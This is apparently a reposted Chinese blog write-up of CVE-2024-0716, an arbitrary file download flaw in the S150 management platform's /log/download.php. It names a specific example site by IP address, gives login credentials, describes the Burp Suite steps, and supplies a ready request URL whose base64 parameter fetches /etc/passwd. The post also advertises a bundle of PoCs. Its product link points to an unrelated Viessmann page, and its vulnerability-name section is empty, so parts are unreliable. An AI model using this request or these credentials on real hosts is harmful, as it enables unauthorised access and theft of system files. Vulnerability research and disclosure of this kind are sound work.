免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
应粉丝要求小编将往期poc和我在网上收集的一些poc打包分享到网盘了。同时分享了大量电子书和护网常用工具,在文末免费获取。
01
—
漏洞名称
02
—
漏洞影响
北京百川智能S150管理平台V31R02B15
产品页面
https://connectivity.viessmann.com/gb/mp-fp/vitogate/vitogate-300-bn-mb.html
03
—
漏洞描述
北京百川智能S150管理平台V31R02B15中备份文件处理程序的/log/download.php文件存在安全漏洞。在配置了备份文件的地方,没有对下载文件的参数进行过滤,这可能导致下载任意的敏感文件,如passwd。攻击者可以利用此漏洞远程发起攻击,并可能导致信息泄露。
04
—
title="smart--管理平台"
05
—
漏洞挖掘过程
示例站点
https://218.205.129.204:8443/patrolflow.php注意:这个站点在本地由于防火墙原因可能打不开,但在虚拟机中可以正常访问
首先登录设备,用户名密码如下
admin/b3f9t8k7
点击设备管理一配置管理一下载备份文件
然后使用burpsuite捕获数据包
可以看到下载的文件名
然后将文件名参数更改为passwd时,我们发现设备仍然执行我们的请求并下载passwd文件
漏洞url如下
https://x.x.x.x:8443/log/download.php?local=yes&type=filedown&file=L2V0Yy9wYXNzd2Q=&filename=passwd参考原文链接如下:
https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md06
—
修复建议
联系厂商获取补丁。不过厂商早已被通知但未做出任何回应。
07
—
原文始发于微信公众号(AI与网安):CVE-2024-0716漏洞挖掘过程学习
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论